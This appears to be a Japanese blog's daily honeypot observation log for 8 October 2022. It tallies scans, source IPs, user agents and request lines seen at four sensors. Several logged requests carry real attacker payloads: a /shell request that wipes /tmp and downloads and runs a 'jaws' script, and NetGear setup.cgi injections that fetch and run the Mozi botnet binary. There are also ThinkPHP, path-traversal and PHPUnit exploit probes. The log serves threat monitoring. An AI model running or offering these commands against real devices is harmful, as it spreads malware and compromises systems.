コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/10/08 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/10/08分です。

特徴
共通

CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws
Location:US

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為

を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
JBoss脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
fasthttpによるスキャン行為
l9exploreによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:76 (前日比:21)
US:総アクセス数:67 (前日比:-25)
UK:総アクセス数:147 (前日比:-6)
SG:総アクセス数:94 (前日比:-15)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.125.137.138 United States
5 20.171.27.17 United States
1 34.148.79.226 United States
2 36.110.211.2 China
1 36.110.211.5 China
1 36.110.214.194 China
1 36.110.214.195 China
3 45.61.185.198 United States
1 68.183.49.245 United States
1 78.142.18.92 Bulgaria
2 88.214.43.215 Turkey
5 95.214.235.205 Ukraine
2 109.237.97.204 Russia
2 129.146.61.255 United States
10 135.125.217.54 France
9 135.125.246.110 France
2 146.190.23.128 United States
1 147.182.237.161 United States
1 156.201.144.153 Egypt
7 159.223.212.213 United States
1 161.35.213.88 United States
1 167.71.59.20 United States
1 167.94.138.47 United States
1 167.94.138.63 United States
1 172.104.242.173 United States
1 172.241.27.133 United States
4 185.142.236.40 Seychelles
4 185.254.196.115 Ukraine
1 192.241.213.173 United States
1 198.235.24.156 United States
1 205.210.31.2 United States
1 223.130.30.132 India

UserAgent一覧

件数 UserAgent
12 -
1 Go-http-client/1.1
1 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
5 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
33 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Roku/DVP-9.10 (289.10E04111A)
1 Wget/1.21
4 curl/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01D\x01
1 \x16\x03\x01\x01H\x01
4 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
35 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /config.json HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /mysql/scripts/setup.php HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
3 GET /post/7Z4y8tajNIpqfmkA63354ecb326c3 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//223[.]130[.]30[.]132:32924/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD / HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 34.89.215.60 United States
1 42.227.187.225 China
1 45.9.150.140 Dominica
1 46.19.138.162 Panama
14 51.79.29.48 Canada
5 54.37.79.75 France
1 64.62.197.122 United States
1 78.142.18.92 Bulgaria
1 87.236.176.150 Belgium
2 92.255.85.183 Hong Kong
1 125.124.101.229 China
2 152.89.196.211 Russia
2 159.223.215.224 United States
1 162.62.191.231 Singapore
2 162.142.125.10 United States
2 162.142.125.121 United States
2 167.71.236.231 United States
1 171.22.30.185 Bulgaria
1 172.105.89.161 United States
1 185.220.101.170 Germany
8 185.254.196.223 Ukraine
1 192.241.205.169 United States
1 192.241.217.221 United States
1 192.241.218.100 United States
2 193.174.89.19 Germany
1 198.235.24.133 United States
1 206.189.28.243 United States
7 207.154.253.141 United States
1 209.127.104.50 Canada

UserAgent一覧

件数 UserAgent
17 -
1 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 Roku/DVP-9.10 (289.10E04111A)

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
2 \x03
8 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 CONNECT google[.]com:443 HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /connector.sds HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /gui/status HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]227[.]187[.]225:42060/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 HEAD / HTTP/1.0
1 OPTIONS / HTTP/1.0
1 POST /Pages/log HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.145.36.218 United States
1 5.188.210.227 Russia
18 20.198.107.188 United States
17 20.222.104.148 United States
2 34.65.172.112 United States
9 35.176.232.248 United States
1 36.110.211.69 China
2 36.110.214.194 China
1 36.110.214.195 China
1 45.61.185.198 United States
1 45.85.190.64 Netherlands
1 46.19.138.162 Panama
18 51.132.139.218 United Kingdom
1 66.240.192.82 United States
1 69.194.182.218 United States
1 78.142.18.92 Bulgaria
3 79.124.62.206 Bulgaria
2 92.255.85.183 Hong Kong
2 109.237.97.204 Russia
1 123.5.177.64 China
18 123.157.222.168 China
1 134.122.105.97 United States
18 137.116.195.77 United States
2 152.89.196.211 Russia
2 159.223.221.124 United States
2 167.94.146.58 United States
2 167.248.133.120 United States
1 172.104.242.173 United States
2 183.136.225.35 China
8 185.254.196.223 Ukraine
1 192.241.213.20 United States
1 192.241.215.237 United States
1 192.241.220.8 United States
2 194.165.16.72 Panama
1 198.235.24.12 United States
1 205.210.31.14 United States

UserAgent一覧

件数 UserAgent
4 'Cloud mapping experiment. Contact research@pdrlabs.net'
43 -
1 Go-http-client/1.1
1 Java/1.8.0_212
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
73 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
10 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0 zgrab/0.x
2 Wget/1.21
2 curl/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_132.145.66.34_80\n
7 \x03
1 \x16\x03\x01\x01D\x01
11 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
11 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
4 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /api.json HTTP/1.1
4 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /manage/account/login HTTP/1.1
4 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
4 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /post/7Z4y8tajNIpqfmkA63354ecb326c3 HTTP/1.1
1 GET /robots.txt HTTP/1.1
4 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
3 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.145.36.218 United States
1 20.10.17.142 United States
2 35.203.12.102 United States
1 45.55.44.85 United States
2 45.61.185.198 United States
1 45.77.239.190 United States
2 46.101.102.184 United States
2 47.242.38.244 United States
21 51.79.29.48 Canada
1 52.157.82.218 United States
3 64.225.62.133 United States
2 80.66.88.203 Russia
1 85.31.46.34 Bulgaria
1 104.194.10.202 United States
7 104.248.21.214 United States
2 109.237.97.204 Russia
1 142.93.34.244 United States
1 146.70.143.138 Romania
2 147.182.156.181 United States
2 152.89.196.211 Russia
1 159.223.210.249 United States
3 159.223.234.60 United States
8 161.35.86.181 United States
2 162.142.125.219 United States
2 167.94.146.59 United States
1 172.104.131.24 United States
1 172.104.242.173 United States
2 188.166.254.108 United States
8 189.174.111.233 Mexico
1 192.241.209.62 United States
1 192.241.213.72 United States
1 192.241.219.157 United States
1 192.241.219.252 United States
2 193.174.89.19 Germany
1 194.26.228.174 Russia
1 198.235.24.135 United States
1 198.235.24.146 United States
1 209.141.34.187 United States

UserAgent一覧

件数 UserAgent
26 -
4 Go-http-client/1.1
1 Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/605.1 NAVER(inapp; search; 1000; 11.5.7; XR)
6 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8
2 fasthttp
3 l9explore/1.3.0

リクエスト内容一覧

件数 Method Request Protocol
1 ABCDEFGHIJKLMNOPQRSTUVWXYZ9999
2 \x03
1 \x16\x03\x01\x01D\x01
13 \x16\x03\x01
1 \xca\x1a\xca\xdaJ\x9b\xa5\x917p\xed '\xfa\xfdjn\x88c\x9eN\xac!\x9e\xf4 \xe05B\xac!\x9eO\xa8c\x9eN\xac\"\x96N\xac!\x9eN\xac!\x9e\xe4\xac!\x9eN\xac
1 \xdbj\xbe\xdf\bZ\x88\xf2\x18\xac\xe3)]\xf6\xc3\xc6uO\xd2!Uk\x90!\xef\xe7Q\x8aYk\x90!To\xd2!Uk\x93)Uk\x90!Uk\x90!\xffk\x90!Uk\xbb
1 `>
1 m\xb8\xff\xe1\x0e\xbf\xdf\xd4g!\x94\xc8k)
1 CONNECT leakix[.]net:443 HTTP/1.1
1 GET /.DS_Store HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rwnyk0bh HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /connector.sds HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /gui/status HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /idx_config/ HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login.action HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /post/7Z4y8tajNIpqfmkA63354ecb326c3 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 OPTIONS / HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
1 PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1